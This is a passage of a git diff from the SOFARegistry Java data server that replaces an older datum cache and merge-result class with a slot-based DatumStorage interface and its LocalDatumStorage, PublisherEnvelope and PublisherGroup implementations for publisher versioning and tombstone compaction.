(!CLIENT_PUB_MAP.containsKey(pubAddr)) { - CLIENT_PUB_MAP.putIfAbsent(pubAddr, new ConcurrentHashMap<>()); - } - CLIENT_PUB_MAP.get(pubAddr).put(registerId, pub); - isChanged = true; - } - } - } - } - Long lastVersion = cacheDatum.getVersion(); - if (isChanged) { - cacheDatum.setVersion(datum.getVersion()); - } - return new MergeResult(lastVersion, isChanged); - } - - /** - * - * @param datum - * @return - */ - private static Long coverDatum(Datum datum) { - String dataCenter = datum.getDataCenter(); - String dataInfoId = datum.getDataInfoId(); - Datum cacheDatum = DATUM_MAP.get(dataCenter).get(dataInfoId); - if (datum.getVersion() != cacheDatum.getVersion()) { - DATUM_MAP.get(dataCenter).put(dataInfoId, datum); - Map pubMap = datum.getPubMap(); - Map cachePubMap = new HashMap<>(cacheDatum.getPubMap()); - for (Entry pubEntry : pubMap.entrySet()) { - String registerId = pubEntry.getKey(); - Publisher pub = pubEntry.getValue(); - String pubAddr = pub.getSourceAddress().getAddressString(); - if (!CLIENT_PUB_MAP.containsKey(pubAddr)) { - CLIENT_PUB_MAP.putIfAbsent(pubAddr, new ConcurrentHashMap<>()); - } - CLIENT_PUB_MAP.get(pubAddr).put(registerId, pub); - Publisher cachePub = cachePubMap.get(registerId); - if (cachePub != null - && pubAddr.equals(cachePub.getSourceAddress().getAddressString())) { - cachePubMap.remove(registerId); - } - } - if (!cachePubMap.isEmpty()) { - for (Publisher cachePub : cachePubMap.values()) { - CLIENT_PUB_MAP.get(cachePub.getSourceAddress().getAddressString()).remove( - cachePub.getRegisterId()); - } - } - } - return cacheDatum.getVersion(); - } - -} \ No newline at end of file + @Autowired private DatumStorage localDatumStorage; + + @Autowired private DataServerConfig dataServerConfig; + + /** + * get datum by specific dataCenter and dataInfoId + * + * @param dataCenter + * @param dataInfoId + * @return + */ + public Datum get(String dataCenter, String dataInfoId) { + return localDatumStorage.get(dataInfoId); + } + + public void clean(String dataCenter, String dataInfoId) { + localDatumStorage.remove(dataInfoId, null); + } + + public DatumVersion getVersion(String dataCenter, String dataInfoId) { + // TODO only get local datacenter + DatumVersion version = localDatumStorage.getVersion(dataInfoId); + return version; + } + + public Map getVersions( + String dataCenter, int slotId, Collection targetDataInfoIds) { + // local + return localDatumStorage.getVersions(slotId, targetDataInfoIds); + } + + public DatumVersion updateVersion(String dataCenter, String dataInfoId) { + return localDatumStorage.updateVersion(dataInfoId); + } + + /** + * get all datum + * + * @return + */ + public Map> getAll() { + Map> datumMap = new HashMap<>(); + datumMap.put(dataServerConfig.getLocalDataCenter(), localDatumStorage.getAll()); + return datumMap; + } + + // get without datum.version, it's more efficient than getDatum + public Map>> getAllPublisher() { + Map>> datumMap = new HashMap<>(); + datumMap.put(dataServerConfig.getLocalDataCenter(), localDatumStorage.getAllPublisher()); + return datumMap; + } + + public Map getByConnectId(ConnectId connectId) { + return localDatumStorage.getByConnectId(connectId); + } + + @VisibleForTesting + public void setLocalDatumStorage(DatumStorage localDatumStorage) { + this.localDatumStorage = localDatumStorage; + } + + @VisibleForTesting + public void setDataServerConfig(DataServerConfig dataServerConfig) { + this.dataServerConfig = dataServerConfig; + } + + public DatumStorage getLocalDatumStorage() { + return localDatumStorage; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/DatumStorage.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/DatumStorage.java new file mode 100644 index 000000000..549f23bdf --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/DatumStorage.java @@ -0,0 +1,92 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.cache; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.RegisterVersion; +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.server.data.slot.SlotChangeListener; +import java.util.Collection; +import java.util.List; +import java.util.Map; +import java.util.Set; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-02 19:52 yuzhi.lyz Exp $ + */ +public interface DatumStorage { + + /** + * get datum by specific dataInfoId + * + * @param dataInfoId + * @return + */ + Datum get(String dataInfoId); + + DatumVersion getVersion(String dataInfoId); + + Map getVersions(int slotId, Collection targetDatInfoIds); + + Map getByConnectId(ConnectId connectId); + + Map> getPublishers(int slot); + + /** + * get all datum + * + * @return + */ + Map getAll(); + + Map> getAllPublisher(); + + DatumVersion put(Publisher publisher); + + DatumVersion createEmptyDatumIfAbsent(String dataInfoId, String dataCenter); + + Map clean( + int slotId, ProcessId sessionProcessId, CleanContinues cleanContinues); + + DatumVersion remove(String dataInfoId, ProcessId sessionProcessId); + + DatumVersion remove( + String dataInfoId, + ProcessId sessionProcessId, + Map removedPublishers); + + DatumVersion put(String dataInfoId, List updatedPublishers); + + Map getDatumSummary(int slotId, String sessionIpAddress); + + SlotChangeListener getSlotChangeListener(); + + Set getSessionProcessIds(); + + Map compact(long tombstoneTimestamp); + + int tombstoneNum(); + + boolean updateVersion(int slotId); + + DatumVersion updateVersion(String dataInfoId); +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/LocalDatumStorage.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/LocalDatumStorage.java new file mode 100644 index 000000000..8f41589cd --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/LocalDatumStorage.java @@ -0,0 +1,261 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.cache; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.RegisterVersion; +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.func.SlotFunction; +import com.alipay.sofa.registry.common.model.slot.func.SlotFunctionRegistry; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.slot.SlotChangeListener; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Maps; +import com.google.common.collect.Sets; +import java.util.*; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-02 19:40 yuzhi.lyz Exp $ + */ +public final class LocalDatumStorage implements DatumStorage { + private static final Logger LOGGER = LoggerFactory.getLogger(LocalDatumStorage.class); + + private final SlotFunction slotFunction = SlotFunctionRegistry.getFunc(); + private final Map publisherGroupsMap = Maps.newConcurrentMap(); + + @Autowired private DataServerConfig dataServerConfig; + + private PublisherGroups getPublisherGroups(String dataInfoId) { + final Integer slotId = slotFunction.slotOf(dataInfoId); + PublisherGroups groups = publisherGroupsMap.get(slotId); + if (groups == null) { + LOGGER.warn("[nullGroups] {}, {}", slotId, dataInfoId); + } + return groups; + } + + private PublisherGroups getPublisherGroups(int slotId) { + PublisherGroups groups = publisherGroupsMap.get(slotId); + if (groups == null) { + LOGGER.warn("[nullGroups] {}", slotId); + } + return groups; + } + + @Override + public Datum get(String dataInfoId) { + final PublisherGroups groups = getPublisherGroups(dataInfoId); + return groups == null ? null : groups.getDatum(dataInfoId); + } + + @Override + public DatumVersion getVersion(String dataInfoId) { + PublisherGroups groups = getPublisherGroups(dataInfoId); + return groups == null ? null : groups.getVersion(dataInfoId); + } + + @Override + public Map getVersions(int slotId, Collection targetDataInfoIds) { + PublisherGroups groups = getPublisherGroups(slotId); + return groups == null ? Collections.emptyMap() : groups.getVersions(targetDataInfoIds); + } + + @Override + public Map getAll() { + Map m = Maps.newHashMapWithExpectedSize(128); + publisherGroupsMap.values().forEach(g -> m.putAll(g.getAllDatum())); + return m; + } + + @Override + public Map> getAllPublisher() { + Map> m = Maps.newHashMapWithExpectedSize(128); + publisherGroupsMap.values().forEach(g -> m.putAll(g.getAllPublisher())); + return m; + } + + @Override + public Map getByConnectId(ConnectId connectId) { + Map m = Maps.newHashMapWithExpectedSize(64); + publisherGroupsMap.values().forEach(g -> m.putAll(g.getByConnectId(connectId))); + return m; + } + + @Override + public Map> getPublishers(int slotId) { + PublisherGroups groups = getPublisherGroups(slotId); + if (groups == null) { + return Collections.emptyMap(); + } + Map> publisherMap = groups.getAllPublisher(); + Map> ret = Maps.newHashMapWithExpectedSize(publisherMap.size()); + for (Map.Entry> publishers : publisherMap.entrySet()) { + final String dataInfoId = publishers.getKey(); + final List list = publishers.getValue(); + // only copy the non empty publishers + if (!list.isEmpty()) { + Map map = + ret.computeIfAbsent(dataInfoId, k -> Maps.newHashMapWithExpectedSize(list.size())); + for (Publisher p : list) { + map.put(p.getRegisterId(), p); + } + } + } + return ret; + } + + @Override + public DatumVersion createEmptyDatumIfAbsent(String dataInfoId, String dataCenter) { + PublisherGroups groups = getPublisherGroups(dataInfoId); + return groups == null ? null : groups.createGroupIfAbsent(dataInfoId).getVersion(); + } + + @Override + public Map clean( + int slotId, ProcessId sessionProcessId, CleanContinues cleanContinues) { + // clean by sessionProcessId, the sessionProcessId could not be null + ParaCheckUtil.checkNotNull(sessionProcessId, "sessionProcessId"); + PublisherGroups groups = getPublisherGroups(slotId); + if (groups == null) { + return Collections.emptyMap(); + } + return groups.clean(sessionProcessId, cleanContinues); + } + + // only for http testapi + @Override + public DatumVersion remove(String dataInfoId, ProcessId sessionProcessId) { + // the sessionProcessId is null when the call from sync leader + PublisherGroups groups = getPublisherGroups(dataInfoId); + return groups == null ? null : groups.remove(dataInfoId, sessionProcessId); + } + + @Override + public DatumVersion put(String dataInfoId, List publishers) { + PublisherGroups groups = getPublisherGroups(dataInfoId); + return groups == null ? null : groups.put(dataInfoId, publishers); + } + + @Override + public DatumVersion put(Publisher publisher) { + return put(publisher.getDataInfoId(), Collections.singletonList(publisher)); + } + + @Override + public DatumVersion remove( + String dataInfoId, + ProcessId sessionProcessId, + Map removedPublishers) { + // the sessionProcessId is null when the call from sync leader + PublisherGroups groups = getPublisherGroups(dataInfoId); + return groups == null ? null : groups.remove(dataInfoId, sessionProcessId, removedPublishers); + } + + @Override + public Map getDatumSummary(int slotId, String sessionIpAddress) { + final PublisherGroups groups = publisherGroupsMap.get(slotId); + return groups != null ? groups.getSummary(sessionIpAddress) : Collections.emptyMap(); + } + + @Override + public SlotChangeListener getSlotChangeListener() { + return new SlotListener(); + } + + @Override + public Set getSessionProcessIds() { + Set ids = Sets.newHashSet(); + publisherGroupsMap.values().forEach(g -> ids.addAll(g.getSessionProcessIds())); + return ids; + } + + @Override + public Map compact(long tombstoneTimestamp) { + Map compacts = Maps.newHashMap(); + publisherGroupsMap.values().forEach(g -> compacts.putAll(g.compact(tombstoneTimestamp))); + return compacts; + } + + @Override + public int tombstoneNum() { + int count = 0; + for (PublisherGroups groups : publisherGroupsMap.values()) { + count += groups.tombstoneNum(); + } + return count; + } + + @Override + public boolean updateVersion(int slotId) { + PublisherGroups groups = publisherGroupsMap.get(slotId); + if (groups == null) { + return false; + } + groups.updateVersion(); + return true; + } + + @Override + public DatumVersion updateVersion(String dataInfoId) { + PublisherGroups groups = getPublisherGroups(dataInfoId); + return groups == null ? null : groups.updateVersion(dataInfoId); + } + + private final class SlotListener implements SlotChangeListener { + + @Override + public void onSlotAdd(int slotId, Slot.Role role) { + publisherGroupsMap.computeIfAbsent( + slotId, + k -> { + PublisherGroups groups = new PublisherGroups(dataServerConfig.getLocalDataCenter()); + LOGGER.info("{} add publisherGroup {}", dataServerConfig.getLocalDataCenter(), slotId); + return groups; + }); + } + + @Override + public void onSlotRemove(int slotId, Slot.Role role) { + boolean removed = publisherGroupsMap.remove(slotId) != null; + LOGGER.info( + "{}, remove publisherGroup {}, removed={}", + dataServerConfig.getLocalDataCenter(), + slotId, + removed); + } + } + + @VisibleForTesting + public void setDataServerConfig(DataServerConfig dataServerConfig) { + this.dataServerConfig = dataServerConfig; + } + + @VisibleForTesting + public DataServerConfig getDataServerConfig() { + return dataServerConfig; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/MergeResult.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/MergeResult.java deleted file mode 100644 index eea48131c..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/MergeResult.java +++ /dev/null @@ -1,70 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.cache; - -/** - * - * @author shangyu.wh - * @version $Id: MergeResult.java, v 0.1 2019-02-20 17:24 shangyu.wh Exp $ - */ -public class MergeResult { - - private Long lastVersion; - - private boolean changeFlag; - - public MergeResult(Long lastVersion, boolean changeFlag) { - this.lastVersion = lastVersion; - this.changeFlag = changeFlag; - } - - /** - * Getter method for property lastVersion. - * - * @return property value of lastVersion - */ - public Long getLastVersion() { - return lastVersion; - } - - /** - * Setter method for property lastVersion. - * - * @param lastVersion value to be assigned to property lastVersion - */ - public void setLastVersion(Long lastVersion) { - this.lastVersion = lastVersion; - } - - /** - * Getter method for property changeFlag. - * - * @return property value of changeFlag - */ - public boolean isChangeFlag() { - return changeFlag; - } - - /** - * Setter method for property changeFlag. - * - * @param changeFlag value to be assigned to property changeFlag - */ - public void setChangeFlag(boolean changeFlag) { - this.changeFlag = changeFlag; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/PublisherEnvelope.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/PublisherEnvelope.java new file mode 100644 index 000000000..0dbe86d33 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/PublisherEnvelope.java @@ -0,0 +1,99 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.cache; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.RegisterVersion; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.StoreData; +import com.alipay.sofa.registry.util.ParaCheckUtil; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-02 19:47 yuzhi.lyz Exp $ + */ +public final class PublisherEnvelope { + final Publisher publisher; + final ProcessId sessionProcessId; + final RegisterVersion registerVersion; + final long tombstoneTimestamp; + + private PublisherEnvelope( + Publisher publisher, + ProcessId sessionProcessId, + RegisterVersion registerVersion, + long tombstoneTimestamp) { + this.publisher = publisher; + this.sessionProcessId = sessionProcessId; + this.registerVersion = registerVersion; + this.tombstoneTimestamp = tombstoneTimestamp; + } + + static PublisherEnvelope of(Publisher publisher) { + ParaCheckUtil.checkNotNull(publisher.getSessionProcessId(), "publisher.sessionProcessId"); + switch (publisher.getDataType()) { + case PUBLISHER: + return pubOf(publisher, publisher.getSessionProcessId()); + case UN_PUBLISHER: + return unpubOf(publisher.registerVersion(), publisher.getSessionProcessId()); + default: + throw new IllegalArgumentException("not accept Publisher Type:" + publisher.getDataType()); + } + } + + static PublisherEnvelope pubOf(Publisher publisher, ProcessId sessionProcessId) { + ParaCheckUtil.checkEquals( + publisher.getDataType(), StoreData.DataType.PUBLISHER, "Publisher.dataType"); + return new PublisherEnvelope( + publisher, + sessionProcessId, + publisher.registerVersion(), + // Long.max means pub never compact + Long.MAX_VALUE); + } + + static PublisherEnvelope unpubOf(RegisterVersion version, ProcessId sessionProcessId) { + return new PublisherEnvelope(null, sessionProcessId, version, System.currentTimeMillis()); + } + + boolean isPub() { + return publisher != null; + } + + RegisterVersion getVersionIfPub() { + return isPub() ? registerVersion : null; + } + + boolean isConnectId(ConnectId connectId) { + return isPub() && publisher.connectId().equals(connectId); + } + + @Override + public String toString() { + StringBuilder sb = new StringBuilder(128); + sb.append("pub=") + .append(isPub()) + .append(", connectId=") + .append(publisher != null ? publisher.connectId() : "null") + .append(", ver=") + .append(registerVersion) + .append(", ts=") + .append(tombstoneTimestamp); + return sb.toString(); + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/PublisherGroup.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/PublisherGroup.java new file mode 100644 index 000000000..5c6e79ec0 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/PublisherGroup.java @@ -0,0 +1,365 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.cache; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.RegisterVersion; +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.common.model.store.ProcessIdCache; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.WordCache; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.collect.Maps; +import com.google.common.collect.Sets; +import java.util.*; +import java.util.concurrent.locks.ReadWriteLock; +import java.util.concurrent.locks.ReentrantReadWriteLock; +import org.apache.commons.collections.MapUtils; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-02 20:26 yuzhi.lyz Exp $ + */ +public final class PublisherGroup { + private static final Logger LOGGER = LoggerFactory.getLogger(PublisherGroup.class); + + private final ReadWriteLock lock = new ReentrantReadWriteLock(); + + final String dataInfoId; + + final String dataCenter; + + final String dataId; + + final String instanceId; + + final String group; + + // if the delete publisher from session, mark unpub + final Map pubMap = Maps.newConcurrentMap(); + + private volatile long version; + + PublisherGroup(String dataInfoId, String dataCenter) { + DataInfo dataInfo = DataInfo.valueOf(dataInfoId); + this.dataInfoId = WordCache.getWordCache(dataInfoId); + this.dataCenter = WordCache.getWordCache(dataCenter); + this.dataId = WordCache.getWordCache(dataInfo.getDataId()); + this.instanceId = WordCache.getWordCache(dataInfo.getInstanceId()); + this.group = WordCache.getWordCache(dataInfo.getGroup()); + if (DatumVersionUtil.useConfregVersionGen()) { + this.version = DatumVersionUtil.confregNextId(0); + } else { + this.version = DatumVersionUtil.nextId(); + } + } + + DatumVersion getVersion() { + return new DatumVersion(version); + } + + Datum toDatum() { + Datum datum = new Datum(); + datum.setDataCenter(dataCenter); + datum.setDataId(dataId); + datum.setDataInfoId(dataInfoId); + datum.setGroup(group); + datum.setInstanceId(instanceId); + long ver; + List list = new ArrayList<>(pubMap.size()); + lock.readLock().lock(); + try { + ver = this.version; + for (PublisherEnvelope envelope : pubMap.values()) { + if (envelope.isPub()) { + list.add(envelope.publisher); + } + } + } finally { + lock.readLock().unlock(); + } + datum.setVersion(ver); + list.forEach(p -> datum.addPublisher(p)); + return datum; + } + + List getPublishers() { + List list = new ArrayList<>(pubMap.size()); + for (PublisherEnvelope envelope : pubMap.values()) { + if (envelope.isPub()) { + list.add(envelope.publisher); + } + } + return list; + } + + Map getByConnectId(ConnectId connectId) { + Map map = Maps.newHashMap(); + for (PublisherEnvelope p : pubMap.values()) { + if (p.isConnectId(connectId)) { + map.put(p.publisher.getRegisterId(), p.publisher); + } + } + return map; + } + + DatumVersion updateVersion() { + if (DatumVersionUtil.useConfregVersionGen()) { + long lastVersion = this.version; + this.version = DatumVersionUtil.confregNextId(lastVersion); + } else { + this.version = DatumVersionUtil.nextId(); + } + return new DatumVersion(version); + } + + private boolean tryAddPublisher(Publisher publisher) { + PublisherEnvelope exist = pubMap.get(publisher.getRegisterId()); + + final RegisterVersion registerVersion = publisher.registerVersion(); + if (exist != null) { + if (exist.registerVersion.equals(registerVersion)) { + if (LOGGER.isDebugEnabled()) { + LOGGER.debug( + "[AddSameVer] {}, {}, exist={}, add={}", + publisher.getDataInfoId(), + publisher.getRegisterId(), + exist.registerVersion, + publisher.registerVersion()); + } + return false; + } + if (!exist.registerVersion.orderThan(registerVersion)) { + LOGGER.warn( + "[AddOlderVer] {}, {}, exist={}, add={}", + publisher.getDataInfoId(), + publisher.getRegisterId(), + exist.registerVersion, + publisher.registerVersion()); + return false; + } + } + pubMap.put(publisher.getRegisterId(), PublisherEnvelope.of(publisher)); + return true; + } + + DatumVersion addPublisher(Publisher publisher) { + publisher.setSessionProcessId(ProcessIdCache.cache(publisher.getSessionProcessId())); + lock.writeLock().lock(); + try { + if (tryAddPublisher(publisher)) { + return updateVersion(); + } + return null; + } finally { + lock.writeLock().unlock(); + } + } + + DatumVersion clean(ProcessId sessionProcessId, CleanContinues cleanContinues) { + sessionProcessId = ProcessIdCache.cache(sessionProcessId); + if (sessionProcessId == null) { + // not check continues + lock.writeLock().lock(); + try { + final int size = pubMap.size(); + if (size == 0) { + return null; + } + cleanContinues.onClean(size); + pubMap.clear(); + return updateVersion(); + } finally { + lock.writeLock().unlock(); + } + } + // collect the pub of the processId without lock + Map cleans = Maps.newHashMapWithExpectedSize(64); + for (Map.Entry pub : pubMap.entrySet()) { + PublisherEnvelope envelope = pub.getValue(); + if (envelope.isPub() && envelope.sessionProcessId.equals(sessionProcessId)) { + cleans.put(pub.getKey(), envelope); + } + } + // clean modify the version, need to lock + lock.writeLock().lock(); + try { + boolean modified = false; + for (Map.Entry clean : cleans.entrySet()) { + if (!cleanContinues.continues()) { + break; + } + if (pubMap.remove(clean.getKey(), clean.getValue())) { + cleanContinues.onClean(1); + modified = true; + } + } + return modified ? updateVersion() : null; + } finally { + lock.writeLock().unlock(); + } + } + + DatumVersion remove(ProcessId sessionProcessId, Map removedPublishers) { + sessionProcessId = ProcessIdCache.cache(sessionProcessId); + if (MapUtils.isEmpty(removedPublishers)) { + return null; + } + lock.writeLock().lock(); + try { + boolean modified = false; + for (Map.Entry e : removedPublishers.entrySet()) { + final String registerId = e.getKey(); + final RegisterVersion removedVer = e.getValue(); + + final PublisherEnvelope existing = pubMap.get(registerId); + if (existing == null || !existing.isPub()) { + // the removedPublishers is from pubMap, but now notExist/unpub/pubByOtherSession + continue; + } + if (existing.registerVersion.equals(removedVer)) { + // sync from leader + if (sessionProcessId == null) { + pubMap.remove(registerId); + modified = true; + continue; + } + if (sessionProcessId.equals(existing.sessionProcessId)) { + // syn from session, mark unpub with higher registerTimestamp + pubMap.put( + registerId, + PublisherEnvelope.unpubOf(removedVer.incrRegisterTimestamp(), sessionProcessId)); + modified = true; + } else { + LOGGER.warn( + "[RemovePidModified] {}, {}, exist={}/{}, expect={}/{}", + dataInfoId, + registerId, + existing.registerVersion, + existing.sessionProcessId, + removedVer, + sessionProcessId); + } + } else { + // the item has modified after diff, ignored + LOGGER.warn( + "[RemoveVerModified] {}, {}, exist={}, expect={}", + dataInfoId, + registerId, + existing.registerVersion, + removedVer); + } + } + return modified ? updateVersion() : null; + } finally { + lock.writeLock().unlock(); + } + } + + DatumVersion put(List puts) { + for (Publisher p : puts) { + ParaCheckUtil.checkNotNull(p.getSessionProcessId(), "publisher.sessionProcessId"); + ParaCheckUtil.checkEquals(p.getDataInfoId(), dataInfoId, "publisher.dataInfoId"); + p.setSessionProcessId(ProcessIdCache.cache(p.getSessionProcessId())); + } + lock.writeLock().lock(); + try { + boolean modified = false; + for (Publisher publisher : puts) { + if (tryAddPublisher(publisher)) { + modified = true; + } + } + if (modified) { + return updateVersion(); + } + return null; + } finally { + lock.writeLock().unlock(); + } + } + + DatumSummary getSummary(String sessionIpAddress) { + Map publisherVersions = + Maps.newHashMapWithExpectedSize(64); + for (Map.Entry e : pubMap.entrySet()) { + PublisherEnvelope envelope = e.getValue(); + RegisterVersion v = envelope.getVersionIfPub(); + if (v == null) { + continue; + } + if (sessionIpAddress == null + || sessionIpAddress.equals(envelope.sessionProcessId.getHostAddress())) { + publisherVersions.put(e.getKey(), v); + } + } + return new DatumSummary(dataInfoId, publisherVersions); + } + + Collection getSessionProcessIds() { + Set set = Sets.newHashSet(); + for (PublisherEnvelope e : pubMap.values()) { + if (e.isPub()) { + set.add(e.sessionProcessId); + } + } + return set; + } + + int compact(long tombstoneTimestamp) { + // compact not modify the version, no need to lock + int count = 0; + Map compacts = Maps.newHashMap(); + for (Map.Entry e : pubMap.entrySet()) { + final PublisherEnvelope envelope = e.getValue(); + if (!envelope.isPub() && envelope.tombstoneTimestamp <= tombstoneTimestamp) { + compacts.put(e.getKey(), envelope); + } + } + + for (Map.Entry compact : compacts.entrySet()) { + if (pubMap.remove(compact.getKey(), compact.getValue())) { + count++; + } + } + return count; + } + + int tombstoneNum() { + int count = 0; + for (PublisherEnvelope envelope : pubMap.values()) { + if (!envelope.isPub()) { + count++; + } + } + return count; + } + + @Override + public String toString() { + return StringFormatter.format( + "PubGroup{{},size={},ver={}}", dataInfoId, pubMap.size(), version); + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/PublisherGroups.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/PublisherGroups.java new file mode 100644 index 000000000..fa758330d --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/PublisherGroups.java @@ -0,0 +1,191 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.cache; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.RegisterVersion; +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.collect.Maps; +import java.util.Collection; +import java.util.List; +import java.util.Map; +import java.util.Set; +import org.apache.commons.collections.CollectionUtils; +import org.glassfish.jersey.internal.guava.Sets; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-02 21:52 yuzhi.lyz Exp $ + */ +public final class PublisherGroups { + private final Map publisherGroupMap = Maps.newConcurrentMap(); + private final String dataCenter; + + 